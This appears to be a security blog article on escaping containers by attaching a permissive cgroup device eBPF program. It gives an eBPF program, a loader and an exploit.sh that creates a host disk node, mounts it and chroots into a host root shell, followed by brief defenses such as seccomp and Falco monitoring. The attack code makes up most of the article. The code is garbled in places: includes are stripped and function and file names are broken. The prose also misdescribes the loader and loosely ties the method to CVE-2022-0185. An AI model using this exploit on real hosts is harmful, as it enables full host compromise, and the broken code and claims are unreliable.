AI, ML, and networking — applied and examined.
Escaping Containers with eBPF: A Cloud-Native Security Deep Dive
Escaping Containers with eBPF: A Cloud-Native Security Deep Dive

Escaping Containers with eBPF: A Cloud-Native Security Deep Dive

Background

With the widespread adoption of cloud-native technologies, container security has become a critical area of focus. eBPF (extended Berkeley Packet Filter), as a powerful technology that can run sandboxed programs in the Linux kernel, provides unprecedented observability and control, but also introduces new attack surfaces. This article explores how to use eBPF to achieve container escape, inspired by the vulnerability CVE-2022-0185.

Principle of Container Escape

The core of this container escape technique lies in abusing eBPF programs of the BPF_PROG_TYPE_CGROUP_DEVICE type. This type of program is designed to be attached to a cgroup (control group) to filter device access from processes within that cgroup.

The workflow is as follows:

  • 1. Loading and Attaching the BPF Program: An attacker with CAP_BPF capability (often granted in privileged containers) can load a custom eBPF program into the kernel.
  • 2. Bypassing Device Access Control: The attacker crafts an eBPF program that always returns BPF_OK (allow access), effectively disabling the cgroup’s device access control mechanism.
  • 3. Creating Host Device Nodes: With the device filter bypassed, the attacker can use the mknod system call inside the container to create a device node that corresponds to a host device, for example, /dev/sda1 (the host’s hard disk).
  • 4. Mounting the Host Device and Getting a Shell: The attacker then mounts this newly created device node to a directory within the container. Since this device is the host’s root filesystem, the attacker gains read and write access to the entire host filesystem, leading to a complete container escape and host compromise.

Constructing the PoC

To execute this attack, we need to meet the following prerequisites:

  • Possession of CAP_SYS_ADMIN and CAP_BPF capabilities. CAP_SYS_ADMIN is required for mounting, while CAP_BPF is needed to load and attach eBPF programs. These are commonly available in privileged containers.
  • The ability to access the root directory of the container’s cgroup, which is necessary for attaching the eBPF program.

Below are the core code snippets for the Proof of Concept (PoC).

1. eBPF Program (bpf_prog.c)

This program is very simple, containing only one function, bpf_allow_device_access, which always returns 1 (BPF_OK), effectively allowing any device access.

c

include

include “bpf_helpers.h”

SEC(“cgroup/dev”)
int bpfallowdeviceaccess(struct bpfcgroupdevctx *ctx) {
// Always allow access
return 1;
}

char _license[] SEC(“license”) = “GPL”;

2. User-space Loader Program (loader.c)

This program is responsible for loading the eBPF program into the kernel and attaching it to the cgroup.

c

include

include

include

include

include

int main(int argc, char **argv) {
if (argc != 3) {
fprintf(stderr, “Usage: %s \n”, argv[0]);
return 1;
}

const char *bpf_file = argv[1];
const char *cgroup_path = argv[2];

struct bpf_object *obj;
struct bpf_program *prog;
int prog_fd, cgroup_fd;

obj = bpf_object__open_file(bpf_file, NULL);
// ... error handling ...

bpf_object__load(obj);
// ... error handling ...

prog = bpf_object__find_program_by_name(obj, "bpf_allow_device_access");
prog_fd = bpf_program__fd(prog);

cgroup_fd = open(cgroup_path, O_RDONLY);
// ... error handling ...

bpf_prog_attach(prog_fd, cgroup_fd, BPF_CGROUP_DEVICE, 0);
// ... error handling ...

printf("eBPF program attached successfully!\n");
close(cgroup_fd);
bpf_object__close(obj);
return 0;

}

3. Attack Script (exploit.sh)

This script automates the entire attack process.

bash

!/bin/bash

1. Compile the eBPF program and the loader

clang -O2 -target bpf -c bpfprog.c -o bpfprog.o
clang loader.c -lbpf -o loader

2. Run the loader to attach the eBPF program to the cgroup root

The cgroup path might differ based on the system

CGROUPPATH=/sys/fs/cgroup/unified
./loader bpf
prog.o $CGROUP_PATH

3. Create a device node for the host’s primary disk

mknod /tmp/host_disk b 8 1

4. Mount the host disk

mkdir /tmp/hostfs
mount /tmp/host
disk /tmp/host_fs

5. Get a root shell on the host

chroot /tmp/host_fs /bin/bash

PoC Code Analysis

  • bpf_prog.c: The SEC("cgroup/dev") macro specifies that this is a cgroup device filter program. The kernel ensures it is attached to the correct hook point.
  • loader.c: First, it loads the compiled eBPF program using bpf_prog_load. Then, it opens the cgroup path (e.g., /sys/fs/cgroup/unified) and uses bpf_prog_attach to attach the program to the BPF_CGROUP_DEVICE hook.
  • exploit.sh: The script begins by compiling the C code. It then executes the loader to attach the eBPF program. The mknod command creates a block device file named host_disk with major number 8 and minor number 1, which typically corresponds to /dev/sda1 on the host. Finally, it mounts this device and uses chroot to gain a root shell on the host system.

Defense and Detection

To defend against and detect this type of eBPF-based container escape, consider the following measures:

  • 1. Principle of Least Privilege: Avoid running containers with unnecessary capabilities, especially CAP_BPF and CAP_SYS_ADMIN. Do not run containers in privileged mode unless absolutely necessary.
  • 2. Seccomp/AppArmor: Use security profiles like Seccomp or AppArmor to restrict system calls. Specifically, you can block the bpf() and mknod() system calls for containers that do not need them.
  • 3. Monitor eBPF Program Loading: Use kernel auditing or security tools like Falco or Tetragon to monitor the loading of new eBPF programs, especially BPF_PROG_TYPE_CGROUP_DEVICE types. Alert on suspicious activity.
  • 4. Kernel Version: Keep the host kernel updated. While this specific technique abuses a feature rather than a bug, newer kernels may introduce stricter checks or mechanisms to mitigate such abuse.

Conclusion

eBPF is a double-edged sword. While it provides powerful capabilities for system observability and networking, it also introduces potent new attack vectors. This container escape method demonstrates how a feature designed for security (cgroup device filtering) can be subverted to compromise the host. For cloud-native environments, it is crucial to adopt a defense-in-depth strategy, combining strict permission management, runtime security monitoring, and proactive vulnerability management to ensure container and host security.

Leave a Reply

Your email address will not be published. Required fields are marked *